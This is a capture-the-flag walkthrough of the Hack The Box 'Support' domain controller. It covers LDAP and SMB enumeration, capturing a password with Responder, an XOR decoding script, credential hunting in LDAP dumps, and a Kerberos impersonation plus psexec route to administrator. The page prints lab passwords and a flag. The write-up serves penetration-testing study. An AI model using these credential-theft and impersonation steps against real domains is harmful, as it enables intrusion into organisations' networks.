This box could be a domain controller [because Kerberos (kerberos-sec) is exposed].
We can enumerate LDAP to find information.
We can create a session using MSRPC - possible reverse shell.
Priorities for enumeration:
SMB - Shares and login access (will use smbclient, crackmapexec)
LDAP - (nmap script - windapsearch.py)
Kerberos -
DNS: Ensure you add the domain name to the /etc/hosts file
RPC
- Possible WinRM?
Enumeration Goal:
Credentials
Anonymous access
Net-Shares
Null sessions
Login default passwords
ICE BREAKER!
LDAP
What is LDAP?
LDAP (Lightweight Directory Access Protocol) is a protocol that helps users find information/data about the organisation, personnel and other relevant objects held on a server. The goals of LDAP are divided into two:
the first is to store information/data in the directory, and the second is to authenticate its users so they can access the directory.
How to enumerate LDAP?
┌──(bsail㉿hackOn)-[~/Desktop/HTB/normal_boxes/Support]
└─$ nmap -n -sV --script "ldap*" 10.10.11.174 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-07 15:28 AEST
NSE: [ldap-brute] passwords: Time limit 10m00s exceeded.
Nmap scan report for 10.10.11.174
Host is up (0.024s latency).
Not shown: 990 filtered tcp ports (no-response)
Bug in ldap-brute: no string output.
Bug in ldap-brute: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-07 05:29:06Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=support,DC=htb
| ldapServiceName: support.htb:dc$@SUPPORT.HTB
| isGlobalCatalogReady: TRUE
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=support,DC=htb
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=support,DC=htb
| namingContexts: DC=support,DC=htb
| namingContexts: CN=Configuration,DC=support,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=support,DC=htb
| namingContexts: DC=DomainDnsZones,DC=support,DC=htb
| namingContexts: DC=ForestDnsZones,DC=support,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 82028
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
| dnsHostName: dc.support.htb
| defaultNamingContext: DC=support,DC=htb
| currentTime: 20231007053907.0Z
|_ configurationNamingContext: CN=Configuration,DC=support,DC=htb
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=support,DC=htb
| ldapServiceName: support.htb:dc$@SUPPORT.HTB
| isGlobalCatalogReady: TRUE
|
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=support,DC=htb
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=support,DC=htb
| namingContexts: DC=support,DC=htb
| namingContexts: CN=Configuration,DC=support,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=support,DC=htb
| namingContexts: DC=DomainDnsZones,DC=support,DC=htb
| namingContexts: DC=ForestDnsZones,DC=support,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 82028
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=support,DC=htb
| dnsHostName: dc.support.htb
| defaultNamingContext: DC=support,DC=htb
| currentTime: 20231007053907.0Z
|_ configurationNamingContext: CN=Configuration,DC=support,DC=htb
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
I'm unsure if I did this correctly, but it wasn't much help.
Moving forward to SMB.
Enumerating SMB
Crackmapexec
As per the photo above, it seems there is a DC on port 445 with a share drive \D: that we could potentially check and identify. Let's check using --shares to see if there are more shares we can obtain.
I tried running enum4linux and noticed that in the password policy section there were errors while looking for a session request. I am guessing that there could be a credential we can find inside this share drive.
Using Smbclient to access shares.
Smbclient
After going through all the trouble of searching for smbclient, and trying to make smbclient work after many forum dives, I managed to check the /support-tools share. From there I downloaded the binaries and .zip files to my Kali box and started playing with them. The next goal is to enumerate the .exe and .zip files in a Windows box.
Windows Enumeration
Moving forward: we will move into a Windows box with the following tools on hand.
dnSpy.exe
good ol' PowerShell
Executing UserInfo.exe
If you execute the binary without its supporting files in the same directory, you will obtain this result instead (from 0xdf's guide).
The correct way of executing it:
Using Windows, I ran into a couple of issues:
OpenVPN from HTB has issues accepting the certificate. It took me quite a while to figure out, so with the time constraints I have I decided I needed to find other ways.
I realised that I only needed the binary to run so I could identify the user. If there are other ways I could do this, I could maybe query it better.
Work around:
I decided to find other ways to run the binary on Linux.
I found mono & wine.
wine64 has issues and requires other dependencies on my own client; again, with the time constraints I have, I decided to use mono, and it seems to work fine.
Obtaining User Credentials
Tools:
Mono: a windows binary emulator
Responder
The strategy for this technique includes:
sudo responder -A -v -I eth0
Set up our own IP to be the one the DNS name resolves to.
Before we begin, ensure that you change the support DNS entry to your own IP, so that Responder can answer the requests arriving on eth0.
It is ideal to begin by setting up your Responder listener, then wait for further requests from the exe.
Once the listener is set up, use "mono" to run the binary and follow the scenario.
As you are playing with the executable, do not forget to check the Responder output, as the binary will send a request to the server to find the given parameters. With this technique the requests are not encrypted throughout the conversation, and you will be able to see the plaintext password.
Note that this can also be done using Wireshark.
Password: nvEfEk16^1aM4$e7AclUf8x$tRWxOW91%lmz
Password LDAP Decryption Script
The second way to obtain the password is to port the decryption routine recovered with dnSpy to a scripting language.
import base64

# Variable set up: the base64 blob and the key recovered from the binary
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
_key = "armando"

# Base64-decode into a mutable byte array
decode_this = bytearray(base64.b64decode(enc_password))

# XOR each byte with the matching key byte (repeating the key) and the constant 223
for x in range(len(decode_this)):
    decode_this[x] ^= ord(_key[x % len(_key)]) ^ 223

# Print the decoded value
decoded_pass = decode_this.decode()
print(decoded_pass)
Result:
Point to note: there are other ways to obtain the password, and there are multiple ways to decode it using a script. I am by no means a master, and it took me a good couple of days researching how base64 and XOR work to decode this.
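Added example (not code from the original writeup or from the box's binary): the same XOR-with-repeating-key-and-constant scheme, wrapped as functions so it can be tested, plus the point the walkthrough above does not spell out: XOR-ing with `key[i]` and then with the constant 223 is exactly one XOR with a single combined key, and the transform is its own inverse, so this is obfuscation rather than encryption. The blob, key and constant are the values from the page; `CONST`, `effective_key` and the function names are my own.

```python
import base64

# Values from the page (the blob and key recovered from the binary with dnSpy).
ENC_PASSWORD = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
KEY = "armando"
CONST = 223  # the extra XOR constant used by the binary


def xor_transform(data: bytes, key: str, const: int = CONST) -> bytes:
    """Apply the binary's scheme: byte ^ key[i mod len(key)] ^ const for every byte."""
    out = bytearray(data)
    for i in range(len(out)):
        out[i] ^= ord(key[i % len(key)]) ^ const
    return bytes(out)


def decrypt(enc_b64: str, key: str = KEY, const: int = CONST) -> str:
    """Base64-decode, then undo the XOR layer (same operation as encrypt)."""
    return xor_transform(base64.b64decode(enc_b64), key, const).decode()


def encrypt(plaintext: str, key: str = KEY, const: int = CONST) -> str:
    """Forward direction: XOR layer, then base64. Identical math to decrypt."""
    return base64.b64encode(xor_transform(plaintext.encode(), key, const)).decode()


def effective_key(key: str, const: int = CONST) -> bytes:
    """Fold the constant into the key: (b ^ k ^ c) == (b ^ (k ^ c))."""
    return bytes(ord(c) ^ const for c in key)


def decrypt_with_effective_key(enc_b64: str, key_bytes: bytes) -> str:
    """Plain repeating-key XOR with the folded key; gives the same result as decrypt()."""
    data = bytearray(base64.b64decode(enc_b64))
    for i in range(len(data)):
        data[i] ^= key_bytes[i % len(key_bytes)]
    return data.decode()


if __name__ == "__main__":
    pw = decrypt(ENC_PASSWORD)
    print(pw)
    # Round trip: encrypting the recovered plaintext reproduces the original blob.
    print(encrypt(pw) == ENC_PASSWORD)
    # The two-step XOR collapses to a single 7-byte key.
    print(decrypt_with_effective_key(ENC_PASSWORD, effective_key(KEY)) == pw)
```

The folded key shows why the constant adds no secrecy: anyone who can read the binary gets `KEY` and `CONST`, and even without `CONST` the scheme reduces to a 7-byte repeating-key XOR. Credentials that a client needs at runtime belong in an OS-protected store, not obfuscated inside a shipped executable.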
Calling LDAP using ldapsearch with the obtained password
Tools used:
ldapsearch
ldapdomaindump
Goal:
Look for a credential
Look for a password
I was having a hard time using the actual tool. It took me at least a couple of hours to figure out whether the network VPN was broken, or whether I was just having a brain fart for not figuring out why the LDAP bind failed; however, as the screenshot below shows, reversing the order of the arguments does miracles and works. I found the solution on a specific website and I will post the link below.
Using the LDAP query below I managed to look at the LDAP information and the users that are on the server.
After the request you will receive multiple files, which include:
HTML
JSON
GREP
Since I'm super lazy, I spun up a quick python3 server in the directory and started browsing/enumerating the dump files.
Example of Python3 server Set up:
Credential Hunting
Looking at the files obtained from the dump, I quickly checked the domain users section, as it usually has something interesting in it.
Expanding on the "support" account
Searching for more information about support, we found that it is a member of "Remote Management Users" and "Shared Support Accounts". BINGO! That is our username.
Looking for password
Obtained from domain_users.json (after hours and hours of searching)...
Credentials For Reverse Shell
Username: support
Password: "Ironside47pleasure40Watchful"
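The hunt through domain_users.json above can be automated. Below is an added example (my own code, not part of the writeup or of ldapdomaindump) that scans the free-text user attributes (description, info, comment) for credential-looking values and lists the members of a given group. The JSON shape is an assumption: a list of objects with "dn" and "attributes" keys, attribute values given as lists, which is how ldapdomaindump's JSON output is laid out as far as I know. The sample data is constructed for this example; only the "support" account and its group names come from the page.

```python
import json
import re

# Constructed sample in the assumed ldapdomaindump domain_users.json shape.
# "support" mirrors the page; "Guest" and "svc_backup" are made up for contrast.
SAMPLE_DOMAIN_USERS = json.dumps([
    {
        "dn": "CN=support,CN=Users,DC=support,DC=htb",
        "attributes": {
            "sAMAccountName": ["support"],
            "description": ["Shared support account"],
            "info": ["Ironside47pleasure40Watchful"],
            "memberOf": [
                "CN=Shared Support Accounts,CN=Users,DC=support,DC=htb",
                "CN=Remote Management Users,CN=Builtin,DC=support,DC=htb",
            ],
        },
    },
    {
        "dn": "CN=Guest,CN=Users,DC=support,DC=htb",
        "attributes": {
            "sAMAccountName": ["Guest"],
            "description": ["Built-in account for guest access to the computer/domain"],
            "memberOf": ["CN=Guests,CN=Builtin,DC=support,DC=htb"],
        },
    },
    {
        "dn": "CN=svc_backup,CN=Users,DC=support,DC=htb",
        "attributes": {
            "sAMAccountName": ["svc_backup"],
            "description": ["Backup service. Temp password: Winter2022!"],
            "memberOf": [],
        },
    },
])

# Free-text attributes where admins tend to leave notes (and secrets).
FREE_TEXT_ATTRS = ("description", "info", "comment")
# Words that usually sit next to a credential in such notes.
KEYWORD = re.compile(r"pass(word|wd)?|pwd|cred", re.IGNORECASE)


def looks_like_secret(token: str) -> bool:
    """Heuristic: one whitespace-free token, 12+ chars, at least three character classes."""
    if len(token) < 12:
        return False
    classes = [
        any(c.islower() for c in token),
        any(c.isupper() for c in token),
        any(c.isdigit() for c in token),
        any(not c.isalnum() for c in token),
    ]
    return sum(classes) >= 3


def find_credential_hints(domain_users_json: str) -> list:
    """Return (sAMAccountName, attribute, value) for every suspicious free-text value."""
    findings = []
    for entry in json.loads(domain_users_json):
        attrs = entry.get("attributes", {})
        user = (attrs.get("sAMAccountName") or ["?"])[0]
        for attr in FREE_TEXT_ATTRS:
            for value in attrs.get(attr, []):
                if KEYWORD.search(value) or any(looks_like_secret(t) for t in value.split()):
                    findings.append((user, attr, value))
    return findings


def members_of(domain_users_json: str, group_cn: str) -> list:
    """List sAMAccountNames whose memberOf contains a DN starting with CN=<group_cn>,."""
    prefix = f"cn={group_cn.lower()},"
    members = []
    for entry in json.loads(domain_users_json):
        attrs = entry.get("attributes", {})
        if any(dn.lower().startswith(prefix) for dn in attrs.get("memberOf", [])):
            members.append(attrs["sAMAccountName"][0])
    return members


if __name__ == "__main__":
    for user, attr, value in find_credential_hints(SAMPLE_DOMAIN_USERS):
        print(f"{user}: {attr} = {value!r}")
    print("Remote Management Users:", members_of(SAMPLE_DOMAIN_USERS, "Remote Management Users"))
```

The same scan is what a domain owner should run periodically: every authenticated user can read these attributes, so a password in a description or info field is effectively public to the whole domain.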
Reverse Shell
User.txt
d9e79134f2ed503af804ed93b84d0842
Priv Escalation Enumeration
Enumerate Remote Box (For more information)
Tools:
Sharphound
BloodHound
Uploaded SharpHound to the box:
In the screenshot below, you will see the information that SharpHound executed with; make sure to download the output file and upload it to your BloodHound.
Upload the result to BloodHound to find a node called SHARED.DC.SUPPORT.HTB. This node has "GenericAll" permissions, which is pretty much similar to a READ-WRITE-EXECUTE permission level, over DC.SUPPORT.HTB.
#### KALI SIDE / ATTACKER SIDE ####
# Request a ticket from 'dc.support.htb' via Kerberos - we are currently pretending to be the "administrator"
python3 getST.py support.htb/NotTrue -dc-ip dc.support.htb -impersonate administrator -spn http/dc.support.htb -aesKey 35968C91CF211A48166F61C736CAE5BB2DD4E0F7DA1248D082C31854879BDAFB
# Set the KRB5CCNAME environment variable so the saved ccache ticket is passed to the requested service
export KRB5CCNAME=administrator.ccache
# Use psexec.py to connect to the server as administrator with the ticket we just obtained
psexec.py support.htb/administrator@dc.support.htb -k -no-pass
ROOT FLAG
BEYOND ROOT (TBA)
Resources
I used an Nmap script to enumerate LDAP - or you can use:
-
Credit to for the PrivEsc walkthrough. I tried to do it on my own; however, I'm not capable enough yet in the AD privilege escalation area. I learned quite a few techniques along the way, and I changed some of the paths to ones I felt comfortable doing.